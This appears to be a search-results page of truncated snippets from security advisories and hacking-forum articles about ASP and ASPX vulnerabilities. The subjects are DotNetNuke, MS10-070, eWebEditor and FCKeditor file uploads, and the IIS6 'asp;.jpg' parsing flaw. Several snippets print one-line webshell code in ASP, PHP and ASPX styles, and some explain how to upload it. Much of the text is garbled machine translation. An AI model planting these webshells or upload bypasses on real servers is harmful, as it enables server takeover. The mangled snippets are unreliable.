223 matches found
DotNetNuke Remote Code Execution vulnerability
======================================= Vulnerability discovered: November 23, 2010 Discovered by: Danil Niggebrugge, Fox-IT BV https://www.fox-it.com/ Reported to vendor: November 30, 2010 Fix available: Yes ======================================= PRODUCT ------------- DotNetNuke is an open sour...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in BugTracker.NET before 3.4.5 allow remote authenticated users to inject arbitrary web script or HTML via (1) the pcd parameter to editbug.aspx, (2) the bugid parameter to editcomment.aspx, (3) the id parameter to edituserpermissions2.aspx, or (4) the...
Microsoft ASP.NET - Auto-Decryptor File Download (MS10-070)
Microsoft ASP.NET - Auto-Decryptor File Download MS10-070 !/usr/bin/ruby -w aspxadchotextattack.rb Copyright c 2010 AmpliaSECURITY. All rights reserved http://www.ampliasecurity.com Agustin Azubel - [email protected] MS10-070 ASPX proof of concept Decrypt data using an auto decryptor...
ASP.NET under the C/S back door--WebAdmin 2.Y application details-vulnerability warning-the black bar safety net
Hello everyone, I don't know whether you have used WebAdmin 2.X? Well, yeah, the one that is a back door for the ASP.NET environment. That's my immature work; if anything in it falls short, I hope you will bear with me. Oh, today?, or let the coupling to the“Huang po sells melon from sell...
eWebEditor .NET versions vulnerability-vulnerability warning-the black bar safety net
Release date: 2010-04-23 Affected versions: ASPX version Vulnerability description: eWebEditorNet is mainly a upload. aspx file there upload vulnerability. Principle: Code form id="post" encType="server" "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript" Just a...
fckeditor for aspx upload vulnerability-vulnerability warning-the black bar safety net
Appear upload vulnerability in the address is: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/aspx/connector. aspx Open this address you can upload any type of file, the horse is uploaded to the location is:...
Spectrum Software WebManager CMS Xss Vulnerability
Exploit for unknown platform in category web applications ================================================== Spectrum Software WebManager CMS Xss Vulnerability ================================================== .:. Script : Spectrum Software WebManager CMS .:. Info link:...
TopWS SQL Injection
topws .aspx Multiple Sql Injection Vulnerability =================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Email : [email protected] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : topws .:. Language : aspx .:. Script Download:...
A way to upload aspxshell for the first-class surveillance system-vulnerability warning-the black bar safety net
Publisher:bincker Time:2010-1-24 The best monitoring system of all know what is going on, the main is to upload the data is filtered out, such as varchar, etc. characters. Yesterday the priest said that there is a monitoring system, can not upload the aspx,I tried the following asp the horse is t...
Response eWebEditor vulnerability to upload file 5 0 0 error of the method-vulnerability warning-the black bar safety net
the eval of the word sometimes fail execute the word are basically successful! By:van Attached to:a variety of written sentence method ASP word 1.& lt;%eval request"YouPass"% 2. %executerequest"YouPass"% 3. %executerequest"YouPass"% Free to killmost of the site of the word 4.& lt;% set ms =...
ASP.NET virtual host path disclosure issue-vulnerability warning-the black bar safety net
While learning ASP.NET I found that an ASP.NET site's code is temporarily compiled (that is how I understood it; this description may not be right) and put in WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files; if you are using the 2.0 framework, then it is WINDOWS\Microsoft...
Talk about Ewebeditor editor of each version of the problem-the vulnerability warning-the black bar safety net
Source: Tosec Security Team 'Blog Recently read something about ewebeditor for this editor, with regard to this vulnerability or a lot, in fact a lot of people doingsecurity testingwhen most of the bias in the injection context, sometimes attention under editor aspect is good, there are mainly as...
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities 1 Abysssec Inc Public Advisory Title : Portili Personal and Team Wiki Multiple Remote Vulnerabilities Affected Version : Portili Personal and Team Wiki = 1.14 Vendor Site : www.Portili.com Discovery : www.Abysssec.com Vendor Contact :...
PsTools in the penetration of little application-vulnerability warning-the black bar safety net
Author:zero soulzerosoul Blog: Recent bad luck, take down a network, Server area all not even outside, no rally socks out, cause penetration of the network within other segments of the time very hard. One of the MSSQL and Web are separated, the server although the take down, but sometimes up to...
php version ewebeditor 3.8. vulnerability-vulnerability warning-the black bar safety net
The PHP version's admin backend calls ../ewebeditor/admin/config.php, as a look at the source code will show. Here I describe how it is used: 1 First, of course, find the backend login page; the default is ../eWebEditor/admin/login.php. Once there, enter any user name and password; of course, it will prompt an error,...
win2003 IIS6 parsing vulnerability practical and application-vulnerability warning-the black bar safety net
A new win2003 IIS6 file parsing vulnerability has been announced. Usage: the webshell file name is changed to 1.asp;.jpg, and direct access in IE is parsed as ASP. That is, an ASP shell named X.asp;.jpg will automatically be resolved as ASP in a win2003 IIS6 environment. We have to combat it out ...
ASPX Spy (CVE-2008-1436; CVE-2009-0078; CVE-2009-0079; CVE-2009-0080)
ASPX Spy, is an ASPX program that allows easy control over a compromised web server. Using this program, an attacker can upload files through the web browser and execute them. A remote attacker may exploit web application vulnerabilities that will allow him to upload the ASPX Spy tool to a target...
ASPX a word of the script the horse detailed analysis-vulnerability warning-the black bar safety net
Source: evil octal First recall before the ASP Word of the classic Trojan! %if request"nonamed""" then execute request"nonamed"% VBS execute is dynamic running the specified code and JSCRIPT also have the eval function can be achieved,that is ASP word the Trojan also has a version is the use of...
The word Trojan is a variety of approach-vulnerability warning-the black bar safety net
asp word %executerequest"1"% php word ? php eval$POST1;?& gt; aspx word script language="C" runat="server" WebAdmin2Y. x. y aaaaa = new WebAdmin2Y. x. y"add6bb58e139be10"; /script Can be escaped ray client figure a word. % set ms = server. CreateObject"MSScriptControl. ScriptControl. 1" ms...